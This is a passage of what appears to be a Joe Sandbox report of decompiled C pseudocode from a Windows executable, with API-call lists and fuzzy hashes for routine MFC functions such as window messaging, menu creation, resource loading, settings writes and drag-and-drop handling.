                  							E004014C0(_t76 - 0x10, __edx);
                  							 *(_t76 - 4) = 1;
                  							_t71 = 0x104;
                  							_t55 = E004014F0(_t76 - 0x10, 0x104);
                  							_t44 = SendMessageA( *(E0040EE3C(_t55, _t76 - 0x10, GetParent( *(_t73 + 0x20))) + 0x20), 0x464, 0x104, _t55);
                  							_t60 = _t76 - 0x10;
                  							__eflags = _t44;
                  							if(_t44 >= 0) {
                  								goto L5;
                  							} else {
                  								E00401E30(_t60);
                  								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
                  								__eflags =  *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0, _t68);
                  								goto L10;
                  							}
                  						}
                  					}
                  				} else {
                  					_t79 =  *(__ecx + 0x20);
                  					if( *(__ecx + 0x20) == 0) {
                  						L10:
                  						_push( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x74)) + 0x24)));
                  						E00406039(_t55,  *((intOrPtr*)(_t76 + 8)), _t68, _t71, _t73, __eflags);
                  					} else {
                  						_t74 =  *((intOrPtr*)(__ecx + 0x80));
                  						_t52 =  *((intOrPtr*)( *_t74 + 0x40))(_t74, _t76 - 0x14);
                  						_push( *((intOrPtr*)(_t76 - 0x14)));
                  						_t75 = _t52;
                  						E00405EE2(0, _t76 - 0x10, __edx, 1, _t75, _t79);
                  						_t80 = _t75;
                  						 *(_t76 - 4) = 0;
                  						if(_t75 >= 0) {
                  							__imp__CoTaskMemFree( *((intOrPtr*)(_t76 - 0x14)));
                  						}
                  						_t60 = _t76 - 0x10;
                  						L5:
                  						E0040A356(_t60, 0xffffffff);
                  						E00405562( *((intOrPtr*)(_t76 + 8)), _t80, _t76 - 0x10);
                  						E004010B0( *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0, _t68);
                  					}
                  				}
                  				return E00431B73( *((intOrPtr*)(_t76 + 8)));
                  			}











                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BBF3
                  • CoTaskMemFree.OLE32(?,?), ref: 0042BC37
                  • GetParent.USER32(?), ref: 0042BC8F
                  • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0042BCA5
                    • Part of subcall function 00405EE2: __EH_prolog3.LIBCMT ref: 00405EE9
                  Similarity
                  • API ID: H_prolog3$FreeMessageParentSendTask
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0040B9CA(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                  				intOrPtr _v12;
                  				char _v16;
                  				struct tagRECT _v32;
                  				struct HDC__* _v44;
                  				char _v52;
                  				struct tagTEXTMETRICA _v108;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t26;
                  				int _t36;
                  				intOrPtr _t41;
                  				void* _t45;
                  				void* _t46;
                  				intOrPtr* _t47;
                  				intOrPtr* _t61;
                  				intOrPtr _t62;
                  
                  				_t61 = __ecx;
                  				_push(0);
                  				E00422E1F(_t45,  &_v52, 0, __ecx, __eflags);
                  				_t26 = SendMessageA( *(_t61 + 0x20), 0x31, 0, 0);
                  				_t46 = 0;
                  				if(_t26 != 0) {
                  					_t46 = E0040B938( &_v52, _t26);
                  				}
                  				GetTextMetricsA(_v44,  &_v108);
                  				_t65 = _t46;
                  				if(_t46 != 0) {
                  					E0040B938( &_v52, _t46);
                  				}
                  				E00422E73(_t46,  &_v52, 0, _t61, _t65);
                  				SetRectEmpty( &_v32);
                  				 *((intOrPtr*)( *_t61 + 0x148))( &_v32, _a12);
                  				 *((intOrPtr*)( *_t61 + 0x118))(0x407, 0,  &_v16);
                  				_t47 = _a4;
                  				 *_t47 = 0x7fff;
                  				_t36 = GetSystemMetrics(6);
                  				_t62 =  *((intOrPtr*)(_t61 + 0x98));
                  				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                  				 *((intOrPtr*)(_t47 + 4)) = _t41;
                  				if(_t41 < _t62) {
                  					 *((intOrPtr*)(_t47 + 4)) = _t62;
                  				}
                  				return _t47;
                  			}






















                  APIs
                    • Part of subcall function 00422E1F: __EH_prolog3.LIBCMT ref: 00422E26
                    • Part of subcall function 00422E1F: GetDC.USER32(00000000), ref: 00422E52
                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040B9E9
                  • GetTextMetricsA.GDI32(?,?), ref: 0040BA07
                  • SetRectEmpty.USER32(?), ref: 0040BA26
                  • GetSystemMetrics.USER32 ref: 0040BA62
                    • Part of subcall function 0040B938: SelectObject.GDI32(?,?), ref: 0040B94A
                  Similarity
                  • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00424BC4(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t15;
                  				intOrPtr _t18;
                  				void* _t22;
                  				void* _t30;
                  				void* _t31;
                  				void* _t39;
                  				intOrPtr _t43;
                  
                  				_t39 = __edi;
                  				_t30 = __ebx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t43 = __ecx;
                  				_v12 = __ecx;
                  				_t15 = E0040ED96(__ecx, __eflags);
                  				if(_t15 != 0) {
                  					if((E00412B38(_t43) & 0x00000100) != 0) {
                  						_t35 = _t43;
                  						_t18 = E004105B2(__ebx, _t43, __edi);
                  						_v8 = _t18;
                  						_t49 = _t18;
                  						if(_t18 == 0) {
                  							E00406436(__ebx, _t35, __edi, _t43, _t49);
                  						}
                  						_push(_t30);
                  						_push(_t39);
                  						_t31 = E0040EE3C(_t30, _t35, GetForegroundWindow());
                  						if(_v8 == _t31 || E0040EE3C(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageA( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
                  							_t22 = 1;
                  							__eflags = 1;
                  						} else {
                  							_t22 = 0;
                  						}
                  						SendMessageA( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
                  					}
                  					_t15 = 1;
                  				}
                  				return _t15;
                  			}















                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetForegroundWindow.USER32 ref: 00424C01
                  • GetLastActivePopup.USER32(?), ref: 00424C25
                  • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00424C3D
                  • SendMessageA.USER32(?,0000036D,00000000,00000000), ref: 00424C62
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00403C90() {
                  				char _v4;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr* _t28;
                  				void* _t29;
                  				void* _t39;
                  				intOrPtr* _t41;
                  				void* _t49;
                  				void* _t56;
                  				intOrPtr* _t58;
                  
                  				_t58 = _t41;
                  				_t59 =  *((intOrPtr*)(_t58 + 0x70));
                  				if( *((intOrPtr*)(_t58 + 0x70)) == 0) {
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(_t58 + 0x74);
                  					_push(E00401000);
                  					 *((intOrPtr*)(_t58 + 0x70)) = E0041654E(_t39, _t49, _t56, _t58, _t59);
                  				}
                  				 *((intOrPtr*)(_t58 + 0x74)) =  *((intOrPtr*)(_t58 + 0x54));
                  				 *((intOrPtr*)(_t58 + 0x78)) =  *((intOrPtr*)(_t58 + 0x58));
                  				_v4 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x60))))();
                  				 *((intOrPtr*)(_t58 + 0x80)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x64))))( &_v4) + 0x20));
                  				_t28 = E00415AD9();
                  				if(_t28 == 0) {
                  					_t29 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t29 =  *((intOrPtr*)( *((intOrPtr*)( *_t28 + 0x74))))();
                  				}
                  				 *((intOrPtr*)(_t58 + 0x98)) =  *((intOrPtr*)(_t29 + 0x20));
                  				 *((intOrPtr*)(_t58 + 0x94)) =  *((intOrPtr*)(_t58 + 0x68));
                  				SetEvent( *(_t58 + 0xa0));
                  				ResetEvent( *(_t58 + 0xa4));
                  				ResetEvent( *(_t58 + 0xa8));
                  				return SetEvent( *(_t58 + 0x9c));
                  			}















                  APIs
                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D1A
                  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D29
                  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D32
                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D3B
                    • Part of subcall function 0041654E: __EH_prolog3.LIBCMT ref: 00416555
                  Similarity
                  • API ID: Event$Reset$H_prolog3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E0042C4B2(int __ebx, intOrPtr* __ecx) {
                  				signed int _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t22;
                  				intOrPtr* _t24;
                  				signed int _t26;
                  				signed int _t27;
                  				int _t30;
                  				void* _t36;
                  				intOrPtr* _t39;
                  
                  				_t30 = __ebx;
                  				_push(__ecx);
                  				_t39 = __ecx;
                  				_v8 =  *((intOrPtr*)( *__ecx + 0x1ac))();
                  				_t22 = CreateMenu();
                  				 *(_t39 + 0x110) = _t22;
                  				if(_t22 != 0) {
                  					_t36 = _t39 + 0x114;
                  					E00431160(_t36, _t36, 0, 0x18);
                  					_t24 =  *((intOrPtr*)(_t39 + 0x100));
                  					_push(_t36);
                  					_push( *(_t39 + 0x110));
                  					_push(_t24);
                  					if( *((intOrPtr*)( *_t24 + 0x24))() == 0) {
                  						_t26 = 0;
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							__eflags =  *(_t39 + 0x128);
                  							if(__eflags != 0) {
                  								_t26 = 1;
                  								__eflags = 1;
                  							}
                  							_t27 = E0040607D(_t30, _t36, _t39, __eflags,  *(_t39 + 0x110), _v8, _t36, 1, _t26);
                  							 *(_t39 + 0x158) = _t27;
                  							__imp__OleCreateMenuDescriptor( *(_t39 + 0x110), _t36);
                  							__eflags = _t27;
                  							_t18 = _t27 != 0;
                  							__eflags = _t18;
                  							 *(_t39 + 0x12c) = _t27;
                  							_t22 = 0 | _t18;
                  						} else {
                  							_t22 = 1;
                  						}
                  					} else {
                  						DestroyMenu( *(_t39 + 0x110));
                  						 *(_t39 + 0x110) =  *(_t39 + 0x110) & 0x00000000;
                  						_t22 = 0;
                  					}
                  				}
                  				return _t22;
                  			}















                  APIs
                  Similarity
                  • API ID: Menu$CreateDestroy_memset
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0041C667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				wchar_t* _t38;
                  				int _t39;
                  				intOrPtr _t44;
                  				intOrPtr _t51;
                  				signed int _t52;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t49 = __edx;
                  				_push(0x60);
                  				E00431B04(E0044B9C2, __ebx, __edi, __esi);
                  				_t44 =  *((intOrPtr*)(_t55 + 8));
                  				_t51 =  *((intOrPtr*)(_t55 + 0xc));
                  				_t54 = __ecx;
                  				 *((intOrPtr*)(_t55 - 0x68)) = _t44 + _t51 - 1;
                  				 *((intOrPtr*)(_t55 - 0x6c)) =  *((intOrPtr*)(E00415AD9() + 0x20));
                  				_t52 = 0 | _t51 != 0x00000001;
                  				E004014C0(_t55 - 0x64, __edx);
                  				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
                  				if(E0041B29E(_t55 - 0x64,  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x134)) + 0x1c)), _t52, 0xa) != 0) {
                  					_t38 = _t55 - 0x60;
                  					if(_t52 != 0) {
                  						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44,  *((intOrPtr*)(_t55 - 0x68)));
                  					} else {
                  						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44);
                  					}
                  					if(_t39 > 0) {
                  						SendMessageA( *( *((intOrPtr*)(_t55 - 0x6c)) + 0x20), 0x362, 0, _t55 - 0x60);
                  					}
                  				}
                  				E004010B0( &(( *(_t55 - 0x64))[0xfffffffffffffffc]), _t49);
                  				return E00431B87(_t44, _t52, _t54);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041C66E
                  • swprintf.LIBCMT ref: 0041C6CB
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0041C6DF
                  • SendMessageA.USER32(00000362,00000362,00000000,?), ref: 0041C6FC
                  Similarity
                  • API ID: swprintf$H_prolog3_MessageSend__vsprintf_s_l
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00417991(void* __ecx) {
                  				void* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t24;
                  				void* _t29;
                  				void* _t31;
                  				struct HINSTANCE__* _t33;
                  				signed int _t35;
                  				signed int _t36;
                  				void* _t38;
                  				signed int* _t41;
                  
                  				_push(__ecx);
                  				_push(_t29);
                  				_t38 = __ecx;
                  				_t43 =  *((intOrPtr*)(__ecx + 0x58));
                  				_t41 =  *(__ecx + 0x60);
                  				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                  				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                  					_t33 =  *(E0041F363(_t29, __ecx, _t41, _t43) + 0xc);
                  					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x58), 5));
                  				}
                  				if(_v8 != 0) {
                  					_t41 = LockResource(_v8);
                  				}
                  				_t31 = 1;
                  				if(_t41 != 0) {
                  					_t36 =  *_t41;
                  					if(_t41[0] != 0xffff) {
                  						_t24 = _t41[2] & 0x0000ffff;
                  						_t35 = _t41[3] & 0x0000ffff;
                  					} else {
                  						_t36 = _t41[3];
                  						_t24 = _t41[4] & 0x0000ffff;
                  						_t35 = _t41[5] & 0x0000ffff;
                  					}
                  					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
                  						_t31 = 0;
                  					}
                  				}
                  				if( *(_t38 + 0x58) != 0) {
                  					FreeResource(_v8);
                  				}
                  				return _t31;
                  			}

















                  APIs
                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004179B9
                  • LoadResource.KERNEL32(?,00000000), ref: 004179C1
                  • LockResource.KERNEL32(00000000), ref: 004179D3
                  • FreeResource.KERNEL32(00000000), ref: 00417A21
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00415695(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t37;
                  				intOrPtr _t44;
                  				void* _t46;
                  				intOrPtr* _t52;
                  				void* _t53;
                  				void* _t54;
                  
                  				_t54 = __eflags;
                  				_t47 = __ecx;
                  				_t45 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044B2CF, __ebx, __edi, __esi);
                  				_t52 = __ecx;
                  				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
                  				E00415F8E(__ebx, __ecx, __edi, __ecx, _t54);
                  				 *((intOrPtr*)(_t53 - 4)) = 0;
                  				 *_t52 = 0x451d64;
                  				_t55 =  *((intOrPtr*)(_t53 + 8));
                  				if( *((intOrPtr*)(_t53 + 8)) == 0) {
                  					 *((intOrPtr*)(_t52 + 0x50)) = 0;
                  				} else {
                  					_t44 = E00433CCF( *((intOrPtr*)(_t53 + 8)));
                  					_pop(_t47);
                  					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
                  				}
                  				_t46 = E0041F363(_t45, 0, _t52, _t55);
                  				_t56 = _t46;
                  				if(_t46 == 0) {
                  					L4:
                  					E00406436(_t46, _t47, 0, _t52, _t56);
                  				}
                  				_t7 = _t46 + 0x74; // 0x74
                  				_t47 = _t7;
                  				_t37 = E00409F26(_t46, _t7, 0, _t52, _t56);
                  				if(_t37 == 0) {
                  					goto L4;
                  				}
                  				 *((intOrPtr*)(_t37 + 4)) = _t52;
                  				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
                  				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
                  				 *((intOrPtr*)(_t46 + 4)) = _t52;
                  				 *((short*)(_t52 + 0x92)) = 0;
                  				 *((short*)(_t52 + 0x90)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x44)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x88)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x48)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x74)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x94)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
                  				return E00431B73(_t52);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041569C
                    • Part of subcall function 00415F8E: __EH_prolog3.LIBCMT ref: 00415F95
                  • __strdup.LIBCMT ref: 004156BE
                  • GetCurrentThread.KERNEL32 ref: 004156EB
                  • GetCurrentThreadId.KERNEL32 ref: 004156F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentH_prolog3Thread$__strdup
                  • String ID:
                  • API String ID: 4206445780-0
                  • Opcode ID: cac488b5aa484b3029be186aead16653baf6d1f59e1c01b3dba40b030be7ba0c
                  • Instruction ID: 7fb29538a6b4f40729483b379fb8af2d26115c614417515ddc3c19090b151fb4
                  • Opcode Fuzzy Hash: cac488b5aa484b3029be186aead16653baf6d1f59e1c01b3dba40b030be7ba0c
                  • Instruction Fuzzy Hash: 07218CB0801B40CFC7219F6A814569AFAF4BFA4704F10891FE5AAC7722DBB8A545CF49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E004265DF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                  				signed int _v8;
                  				char _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t13;
                  				CHAR* _t21;
                  				char* _t24;
                  				intOrPtr _t28;
                  				void* _t30;
                  				signed int _t31;
                  
                  				_t28 = __edx;
                  				_t13 =  *0x463404; // 0x38a11573
                  				_v8 = _t13 ^ _t31;
                  				_t24 = _a8;
                  				_t30 = __ecx;
                  				_t29 = _a4;
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					swprintf( &_v24, 0x10, 0x452000, _a12);
                  					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
                  				} else {
                  					_t30 = E0042652C(__ecx, _t29);
                  					if(_t30 != 0) {
                  						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                  						_t29 = _t21;
                  						RegCloseKey(_t30);
                  						_t18 = 0 | _t21 == 0x00000000;
                  					}
                  				}
                  				return E00430650(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                  			}















                  APIs
                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0042661A
                  • RegCloseKey.ADVAPI32(00000000), ref: 00426623
                  • swprintf.LIBCMT ref: 00426640
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00426651
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction ID: e4b09b4b087a4c94818457906bb1b79e27778f0661a387acb9e5ce4406507e57
                  • Opcode Fuzzy Hash: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction Fuzzy Hash: A5010472600218BBD7109F659C46FBFB7ACEF48714F51042BFA00A3181DAB8ED018768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00411046(intOrPtr* __ecx) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t14;
                  				intOrPtr* _t19;
                  				void* _t20;
                  
                  				_t21 = __ecx;
                  				_t19 = __ecx;
                  				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
                  					_t21 = __ecx;
                  					 *((intOrPtr*)( *__ecx + 0x188))();
                  				}
                  				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
                  				E0040F918(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t22 = _t19;
                  				_t20 = E004105B2(_t19, _t19, 0);
                  				_t26 = _t20;
                  				if(_t20 == 0) {
                  					E00406436(_t20, _t22, 0, SendMessageA, _t26);
                  				}
                  				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
                  				E0040F918(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t14 = GetCapture();
                  				if(_t14 != 0) {
                  					return SendMessageA(_t14, 0x1f, 0, 0);
                  				}
                  				return _t14;
                  			}










                  APIs
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00411072
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0041109D
                  • GetCapture.USER32 ref: 004110AF
                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004110BE
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: 118744c1a2b180471df96bfcb67b41c57b21864dd20d526ec31da897e524b114
                  • Instruction ID: 17e571b5f7ff4c9ef8489950eafba025f931e03d8fe3bfc599a458d3e8fa3cf5
                  • Opcode Fuzzy Hash: 118744c1a2b180471df96bfcb67b41c57b21864dd20d526ec31da897e524b114
                  • Instruction Fuzzy Hash: 640175317402947BDB301B638CCDFDB3E7AEBCAB50F110079B705AA1E7C9A54880D664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0042E37E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
                  				struct _FILETIME _v12;
                  				struct _SYSTEMTIME _v28;
                  				void* __ebp;
                  				int _t23;
                  				int _t25;
                  				void* _t38;
                  				void* _t40;
                  
                  				_t40 = __esi;
                  				_t39 = __edi;
                  				_t38 = __edx;
                  				_t30 = __ebx;
                  				_t44 = _a8;
                  				if(_a8 == 0) {
                  					E00406436(__ebx, __ecx, __edi, __esi, _t44);
                  				}
                  				_push(_t40);
                  				_v28.wYear = E0042E146();
                  				_v28.wMonth = E0042E169();
                  				_v28.wDay = E0042E188();
                  				_v28.wHour = E0042E1A6();
                  				_v28.wMinute = E0042E1C5();
                  				_v28.wSecond = E0042E1E4();
                  				_v28.wMilliseconds = 0;
                  				_t23 = SystemTimeToFileTime( &_v28,  &_v12);
                  				_t42 = GetLastError;
                  				if(_t23 == 0) {
                  					E0042EAA8(_t30, _t38, _t39, GetLastError, GetLastError(), 0);
                  				}
                  				_t25 = LocalFileTimeToFileTime( &_v12, _a8);
                  				if(_t25 == 0) {
                  					_t25 = E0042EAA8(_t30, _t38, _t39, _t42, GetLastError(), _t25);
                  				}
                  				return _t25;
                  			}











                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042E3E5
                  • GetLastError.KERNEL32(00000000), ref: 0042E3F7
                  • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 0042E406
                  • GetLastError.KERNEL32(00000000), ref: 0042E411
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Time$File$ErrorLast$Exception@8H_prolog3LocalSystemThrow
                  • String ID:
                  • API String ID: 821146650-0
                  • Opcode ID: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction ID: 7f314973e1ded6b7ef5a961ee441c8429dab474b5b76dc5320eba2664e5a75b7
                  • Opcode Fuzzy Hash: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction Fuzzy Hash: 6A111E25F10229A7DF10BBF79C055AE77BDAF44718F80506BA901A7351EA788A1087DD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0040918B(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
                  				signed int _v8;
                  				char _v268;
                  				signed int _v272;
                  				int _v276;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t18;
                  				void* _t31;
                  				intOrPtr _t32;
                  				intOrPtr _t38;
                  				void* _t39;
                  				intOrPtr* _t40;
                  				intOrPtr _t41;
                  				intOrPtr _t44;
                  				signed int _t48;
                  				void* _t51;
                  
                  				_t51 = __eflags;
                  				_t38 = __edx;
                  				_t33 = __ecx;
                  				_t46 = _t48;
                  				_t18 =  *0x463404; // 0x38a11573
                  				_v8 = _t18 ^ _t48;
                  				_t31 = _a4;
                  				_push(_t39);
                  				E0040EE3C(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
                  				_v276 = DragQueryFileA(_t31, 0xffffffff, 0, 0);
                  				_t24 = E0041F363(_t31, _t39, DragQueryFileA, _t51);
                  				_v272 = _v272 & 0x00000000;
                  				_t40 =  *((intOrPtr*)(_t24 + 4));
                  				if(_v276 > 0) {
                  					do {
                  						DragQueryFileA(_t31, _v272,  &_v268, 0x104);
                  						 *((intOrPtr*)( *_t40 + 0x88))( &_v268);
                  						_v272 = _v272 + 1;
                  						_t24 = _v272;
                  					} while (_v272 < _v276);
                  				}
                  				DragFinish(_t31);
                  				_pop(_t41);
                  				_pop(_t44);
                  				_pop(_t32);
                  				return E00430650(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
                  			}






















                  APIs
                  • SetActiveWindow.USER32(?), ref: 004091AB
                  • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 004091C4
                  • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004091F7
